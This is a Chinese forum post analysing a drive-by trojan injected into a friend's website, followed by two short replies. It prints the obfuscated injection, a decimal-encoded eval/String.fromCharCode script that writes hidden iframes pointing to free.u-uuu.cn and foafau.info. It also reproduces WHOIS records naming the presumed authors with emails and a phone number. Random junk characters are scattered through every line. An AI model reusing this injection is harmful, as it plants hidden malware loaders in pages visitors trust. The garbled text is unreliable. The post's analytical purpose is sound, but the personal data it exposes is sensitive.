[原创]一篇刚写的分析木马手记

首发在我的博客里面， GFlsI-*`  
tq@<8?  
http://www.areway.cn/?p=175 7"*- >mg  
IwFg1\>  
,X\z#B  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： J;"XRE[%5  
          gNs@Q!  
<script>t=’60,105,102,114,97,109,101, 1 EC
0wX  
32,115,114,99,61,104,116,116,112,58,47,47, FL/y{;  
102,114,101,101,46,117,45,117,117,117,46,99, % C6 H(  
110,47,101,114,114,111,114,46,104,116,109, FPFt3XL  
32,119,105,100,116,104,61,49,48,48,32,104, 9z_Gf]J~  
101,105,103,104,116,61,48,62,60,47,105,102, .,m$
Cm  
114,97,109,101,62′; RLulz|jC  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> A1%V<im@Z  
                                                                                                  kf-ZE$S4  
<script>t=’60,105,102,114,97,109,101,32,115, N4fuV?E`  
114,99,61,104,116,116,112,58,47,47,102,114, ENJ]  
101,101,46,117,45,117,117,117,46,99,110,47, giaO7Qh~  
101,114,114,111,114,46,104,116,109,32,119, HE+VanY![  
105,100,116,104,61,49,48,48,32,104,101,105, c!Pi)  
103,104,116,61,48,62,60,47,105,102,114,97, PU?kQZU~)  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); kHz3_B9[  
document.write(t);</script> $am7 xd  
                                                                                                  4)'5;|pI  
<html xmlns=” sd8o&6  
http://www.w3.org/1999/xhtml 51;(vf  
“> Q:-H UbB  
<head> >PySd"u  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> |.(o4<nx.  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />  T X6Ydd  
<title>首页 - 爱生活家庭网 "[GIW+ui  
                                                                                                                                                    [mWo&Ph[-  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 >454Yir0Mk  
转换字符串后的大概内容是（谁点击后果自付）： T| 4c\  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… KDQux  
                                                                                                                                  <hy>NM@$  
查询玉米u-uuu.cn的详细信息： s|,gn5  
Domain Name: u-uuu.cn X[Y!=e4z  
ROID: 20070901s10001s64972306-cn ]vT  
Domain Status: ok ItOVx!"@9  
Registrant Organization: 王雷 7BI0g@$Nn]  
Registrant Name: 王雷 R>gj"nB  
Administrative Email: czlovexs@126.com y-sQ"HPN  
Sponsoring Registrar: 北京万网志成科技有限公司 yuI5# VUS  
Name Server:ns.yovole.com u%}vTCg*p  
Name Server:ns1.yovole.com )[nzmL*w  
Registration Date: 2007-09-01 17:54 sUbZVPDr  
Expiration Date: 2008-09-01 17:54 RE"}+D  
最后PING了一下地址 都没有什么…. gscsB4<  
                                                                                                ZklidHL');  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. T_Y6AII  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> 79x^zqLb  
<script language=”javascript” src=” *^.b}K%  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script -BoN}xE4  
> I}k!i+Yl  
这个玉米应该有可能是木马作者的： B[$KnQM9Y  
foafau.info的详细信息： 6f1;4Jfp  
Access to INFO WHOIS information is provided to assist persons in *ZaK+ B
 
determining the contents of a domain name registration record in the g_n=vO('X  
Afilias registry database. The data in this record is provided by OvK_CN{  
Afilias Limited for informational purposes only, and Afilias does not t1ZZru'r  
guarantee its accuracy.  This service is intended only for query-based bjQfZ
T(  
access. You agree that you will use this data only for lawful purposes ~}ewna/2  
and that, under no circumstances will you use this data to: (a) allow, DMs|Q$XB  
enable, or otherwise support the transmission by e-mail, telephone, or bQ .y,+  
facsimile of mass unsolicited, commercial advertising or solicitations 2_F`ILCML  
to entities other than the data recipient’s own existing customers; or ,cC4d`  
(b) enable high volume, automated, electronic processes that send F=P|vYL&&  
queries or data to the systems of Registry Operator, a Registrar, or OH)SdSBz  
Afilias except as reasonably necessary to register domain names or orHVL2 KK  
modify existing registrations. All rights reserved. Afilias reserves UNY>Q7  
the right to modify these terms at any time. By submitting this query, mLq?-&F  
you agree to abide by this policy. Y$Uvt_  
Domain ID:D22418703-LRMS },f7I^s|  
Domain Name:FOAFAU.INFO >T!n* -Zn  
Created On:20-Nov-2007 16:05:42 UTC h/_z QR-  
Last Updated On:20-Nov-2007 16:05:44 UTC !J2Lp  
Expiration Date:20-Nov-2008 16:05:42 UTC d[$1:V  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) ^R<= }  
Status:CLIENT DELETE PROHIBITED K}Z'!+<U  
Status:CLIENT RENEW PROHIBITED KqtI^qC8  
Status:CLIENT TRANSFER PROHIBITED k8*=1kl"  
Status:CLIENT UPDATE PROHIBITED 8g0& (9<)  
Status:TRANSFER PROHIBITED wk5a &  
Registrant ID:GODA-040110615 `>#X,Lw$g  
Registrant Name:liu hong HE(U0<9c  
Registrant Organization: CWDo_g$  
Registrant Street1:beijing %5z88-\  
Registrant Street2: {'r*Jb0  
Registrant Street3: ?$s2]}v  
Registrant City:beijing ?2=c'%w7  
Registrant State/Province: ^OQ_iPPI  
Registrant Postal Code:100000 ?tSY=DK\n  
Registrant Country:CN ;w6\r!O,  
Registrant Phone:+86.860108888777 BO[A1'>  
Registrant Phone Ext.: uox;PDK  
Registrant FAX:
Y0eu^p)  
Registrant FAX Ext.: b?y1cxTT  
Registrant Email:bbbshiji@163.com c|O5Vp}  
Admin ID:GODA-240110615 3}T&|@*  
Admin Name:liu hong >2C;5ba  
Admin Organization: <N`rcKE%~P  
Admin Street1:beijing j5/H#_.  
Admin Street2: =8J\
;h  
Admin Street3: hQet?*diU  
Admin City:beijing Dl"y|  
Admin State/Province: qK#* UR0%  
Admin Postal Code:100000 W&p-Z"=)  
Admin Country:CN f9\7v_  
Admin Phone:+86.860108888777 E=
x\f "Z  
Admin Phone Ext.: H+: $ 7;  
Admin FAX: 5?I]\Tb  
Admin FAX Ext.: Icr'l$PE  
Admin Email:bbbshiji@163.com QR8F'7S  
Billing ID:GODA-340110615 d5],O48A  
Billing Name:liu hong Fvv6<
E  
Billing Organization: XSD7~X/:  
Billing Street1:beijing Xg%zE  
Billing Street2: 2]C0d8=*?  
Billing Street3: W&yw5rt**  
Billing City:beijing b<7.^  
Billing State/Province: .[_&>@bmrP  
Billing Postal Code:100000 $YSOkyC?  
Billing Country:CN RE7[bM3a  
Billing Phone:+86.860108888777 $L`7J$'^  
Billing Phone Ext.: $qEJO=v  
Billing FAX: -51L!x}1c  
Billing FAX Ext.: }=L >u>cP  
Billing Email:bbbshiji@163.com +ypT"y  
Tech ID:GODA-140110615 o1g[(zky  
Tech Name:liu hong #/1Bam6
 
Tech Organization: DV.MvFV  
Tech Street1:beijing :?^(&3;  
Tech Street2: ~\kRW6  
Tech Street3: 9GGBJTk-  
Tech City:beijing &#)3v8  
Tech State/Province: c,-< 4e  
Tech Postal Code:100000 nh8h?&q|  
Tech Country:CN ]v#T'<Nl  
Tech Phone:+86.860108888777 \m\.+q]  
Tech Phone Ext.: 1ii.nt1u  
Tech FAX: UHg^F4>4  
Tech FAX Ext.: Ri3m438  
Tech Email:bbbshiji@163.com Z?@07Y[|K  
Name Server:NS27.DOMAINCONTROL.COM Q^F-8  
Name Server:NS28.DOMAINCONTROL.COM ilHj%h*z  
Name Server: !#?tA/t@  
Name Server: < xV!vN  
Name Server: tN0>5'/  
Name Server: G.N
3R  
Name Server: I2/wu(~>  
Name Server: E7D^6G&i  
Name Server: f2Slsl;
 
Name Server:  C[Fh^  
Name Server: zZ wD)p?_g  
Name Server: CkflEmfe  
Name Server: #&/*ll)  
                                                                                                          -^Lj~O  
接着下载每个文件里面的代码： :kUH>O  
一步一步看.. yZ  P
+  
q)vD "{0.  
IaJ(T>"+  
un/R7"  
~cez+VQe  
_1hqD EM  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。